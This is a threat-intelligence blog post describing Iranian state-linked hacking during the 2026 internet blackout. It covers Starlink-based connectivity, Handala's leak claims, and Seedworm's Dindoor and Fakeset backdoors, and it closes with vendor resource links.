On the morning of 28 February 2026, US and Israeli aircraft began the strikes that would announce the formal initiation of the conflict that now gripping the Middle East. By nightfall, NetBlocks was reporting Iranian internet connectivity at four percent of baseline level. By 7 March, after nine consecutive days of a near-blackout, the number stood at one percent. One hundred and twenty hours of flatlining, as one well-known publication described it, measured in fractions of a country. 

And yet, in the seven days that followed, Iranian-aligned threat actors hit a US bank, a defence-sector software company with Israeli operations, an American airport, two Gulf energy corporations, and put backdoors on several networks in Canada. They also exfiltrated a claimed 1.3 terabytes of data from an oil company. Their footprint was visible across cyberspace. In fact APT 34 was attacking networks in India, Brazil, Bahrain and Canada.   

So the question arises. How does a nation with just one percent internet connectivity mount that kind of offensive? Is this some form of deception? The answer, as discovered this week by national cyber agencies, government threat intelligence teams, Shieldworkz researchers and open-source forensic observation, points to a constellation of satellites parked 550 kilometers above the Earth that Iran has simultaneously banned, criminalized, jammed, and, through its intelligence operatives, quietly exploited.

Before we move forward, don’t forget to check out our previous post on “As global conflicts escalate, APT playbooks are quietly changing”, here. 

So, here is what happened.

One percent connectivity and still online

Iran's current internet blackout is actually the second near-total shutdown in less than 60 days. The first started on 8 January 2026, triggered by mass protests, and reduced connectivity to approximately three percent. Partial restoration occurred inFebruary, with traffic recovering to roughly fifty percent of normal by mid-month before collapsing again on 28 February following Operation Epic Fury, the joint US-Israeli strike campaign. Since then, NetBlocks has reported connectivity consistently at or below four percent, with the most recent published measurement on 7 March showing connectivity sitting at just one percent. 

The National Information Network, which is Iran's domestic intranet, remains partially functional but for whitelisted institutions. State media, government ministries, and IRGC-aligned communications channels were among the first services restored under the whitelist system (in a specific order of priority). That means regime’s loyal operators, including intelligence contractors and sanctioned cyber units, have access to controlled domestic connectivity even when civilian internet is severed. Their access to the global internet, however, requires something else and that descended from the sky.

It is said that 7,000 Starlink terminals were brought into Iran during the January blackout, as per a Wall Street Journal report confirmed by multiple downstream outlets this week. Plus an estimated 50,000 smuggled ones that were already in Iran, created the physical substrate for a parallel communications layer used by segments protesting against the Iranian government. 

Iran's jamming response has been persistent and documented. GPS interference data analyzed by Shieldworkz from gpsjam.org has shown persistent contamination of the 1575.42 MHz GPS L1 band across the Tehran region since 28 February, consistent with the mobile jamming operations that began in January. The effect is degradation of Starlink lock rather than total blackout. Users with clear sky access away from mobile jammer radius continue to achieve usable throughput. That residual window, narrow in the cities, wider in rural and peri-urban areas, is what threat actors have been using. Some of the terminals may have also been seized by Iranian intelligence agencies and used to support operations of the threat actors. 

Iranian Internet connectivity chronology: 28 February to 10 March 2026

Sources: NetBlocks via Mastodon; CNBC March 7 2026; gpsjam.org; The National 

Satellite operations and escalation

Handala Hack's activities in the last seven days represent a qualitative shift from its prior operating pattern. The group, assessed with high confidence by multiple Western government agencies to be a persona operated by Iran's Ministry of Intelligence and Security, has moved from hack-and-leak in Israel to multi-vector operations spanning the whole of Gulf, the United States, and even the Iranian diaspora in North America.

The use of Starlink as a connectivity layer is the operational foundation making all of this possible. Handala campaigns werealready run from Starlink IP ranges, with the group probing externally facing applications for misconfigurations and weak credentials. That pattern has continued into March.  

The most significant Handala operation of the last seven days was the claimed breach of an oil company in UAE. Handala posted the claim on 3 March (when connectivity was less than 4 percent), asserting extraction of 1.3 terabytes of data including financial statements, oil contracts, and internal documents. The group's post on its dark web leak site stated and I quote 'We dismantled critical infrastructure (SIC) and extracted 1.3TB of sensitive data.' The language is consistent with the group's originalcommunication style, designed for maximum psychological impact on Gulf governments that it regards as US military enablers. The impacted oil company has not publicly confirmed or denied the intrusion. Analysis of the leaked sample material, where researchers have been able to examine it, has not yet definitively established whether the data is fresh or pre-existing, though the volume claimed is substantially larger than the recycled-data from another claim made during the same week, which researchers classified as likely fabricated or heavily padded with previously circulating files. This is a clear sign of desperation.

Separately, Handala also listed an Israeli oil company as a ransomware victim, with the same claimed 1.3 terabyte exfiltration figure appearing across both listings. The coincidence of figures across two separate organizations is a red flag for inflation, and the total combined claim should be treated with appropriate skepticism. What is not in doubt is the targeting pattern: Gulf energy infrastructure and Israeli energy sector, the two categories most likely to generate strategic panic and media amplification.

Seedworm in US networks

The most significant revelation of the past seven days came not from Handala but from Seedworm, the long-running Iranian APT group that US government agencies including CISA, the FBI, and the UK NCSC have attributed to Iran's Ministry of Intelligence and Security. Seedworm has been sitting inside the networks of multiple US organizations since at least early February, weeks before the first airstrike. It is possible that Seedworm has also made its way into networks connected with other countries as well.

The confirmed victim list includes a US bank, a US airport, a US-based software company that supplies the defence and aerospace industries and has operations in Israel, and non-governmental organisations in both the United States and Canada. Researchers do not know how Seedworm gained initial access but an insider path cannot be ruled out at this point. The group's is known for using techniques such as phishing and exploitation of vulnerabilities in public-facing applications, but the specific entry vector for this campaign has not been determined.

What the researchers also found a new set of tools used by the threat actor. The primary backdoor, named Dindoor, exploits Deno, the secure runtime for JavaScript and TypeScript developed as a modern alternative to Node.js, to run commands on infected machines. The choice of Deno is noteworthy. It is a relatively new runtime with a smaller security research footprint than its immediate predecessor, and its network communications can blend into legitimate developer traffic in environments where Deno is in use. Dindoor was digitally signed with a certificate issued to an individual named Amy Cherne. That name connects directly to earlier Seedworm activities, though the certificate itself was issued for this campaign and is distinct from legacy Seedworm signing infrastructure.

A second backdoor found on the US airport and Canadian NGO networks, named Fakeset, was written in Python and signed with both the Amy Cherne certificate and a certificate issued to Donald Gay, another name previously linked to Seedworm malware families Stagecomp and Darkcomp. The certificate chain is the operational security mistake that makes attribution possible. Was this a mistake committed deliberately to ensure attribution? That is a likely possibility.

In at least one incident targeting the defence-aerospace software company, Seedworm attempted to exfiltrate data using Rclone, a widely available open-source tool for synchronising data to cloud storage services, directed at a Wasabi Technologies cloud storage bucket. Whether the transfer succeeded remains unconfirmed. The malware for Fakeset was hosted on Backblaze, another commercial cloud storage provider, continuing a pattern of using legitimate infrastructure to evade detection.

The critical strategic question raised by this discovery is whether Seedworm was pre-positioning for intelligence collection or pre-positioning for disruption or both. Any network access can be used to launch an escalating attack commencing with data exfiltration and ending with a kinetic incident.  

This is made more unsettling by what happened to Iran's 2025 CCTV surveillance operation. In May 2025, MuddyWater compromised a server containing live CCTV streams from Jerusalem. On 23 June 2025, Iran bombed Jerusalem. Israeli authorities reported on the same day that Iranian forces had used compromised security cameras to collect real-time targeting intelligence. The trajectory from passive access to active targeting was five weeks. The Seedworm foothold in US networks was planted in early February. It is now mid-March.

What lies ahead?

The past seven days have been characterised by a high ratio of claims to confirmed impacts. Most hacktivist assertions of successful ICS compromise, energy sector destruction, and critical infrastructure disruption remain unverified. The Foundation for Defense of Democracies published analysis this week stating flatly that most of the claims of successful hacks are likely false or overblown. Jordan's National Cybersecurity Center confirmed it thwarted, not succumbed to, the attack on its wheat silo management system.  

But the quiet professional layer is a different story. Seedworm's confirmed presence inside a US bank, an airport, a defence supplier's Israeli operations, and multiple NGOs is not a claim. It is documented network activity, forensically attributed through certificate chains and malware code, and the affected organizations have been notified. The foothold exists. The question for the next two to four weeks is whether it remains espionage infrastructure or becomes the basis for a disruptive or destructive operation.

For organisations in sectors touched by this week's confirmed activity, the signal is clear: the door the Seedworm team walked through in February is still open in many organizations that do not yet know they were targeted. The Dindoor backdoor was built to be invisible. Here is how things could unfold:

· Iranian threat actors trigger more pre-compromised networks to target enterprises in the Gulf and beyond. They may use these networks to mask suspicious traffic

· As bandwith increases, the recon capacity of these groups will increase

· Iranian actors could also gain access to the botfarms run by Russian and Chinese APT groups to target specific critical infrastructure entities

· In the meantime, Iranian groups will claim to be responsible for many more breaches to stay in the news

· We are yet to see the peak of targeting efforts of Iranian actors    

In addition, these patterns can be extrapolated to understand what the next set of targets could be:

 Get a custom threat intelligence briefing, here.  

 Download additional resources

IEC 62443-Based Risk assessment checklist for Airport operations and critical infrastructure
Operational Technology (OT) Incident response checklist
IEC 62443 OT Cybersecurity Risk Assessment Field Checklist for Oil & Gas Sites
Defensive Posture Guidance for Middle Eastern Enterprises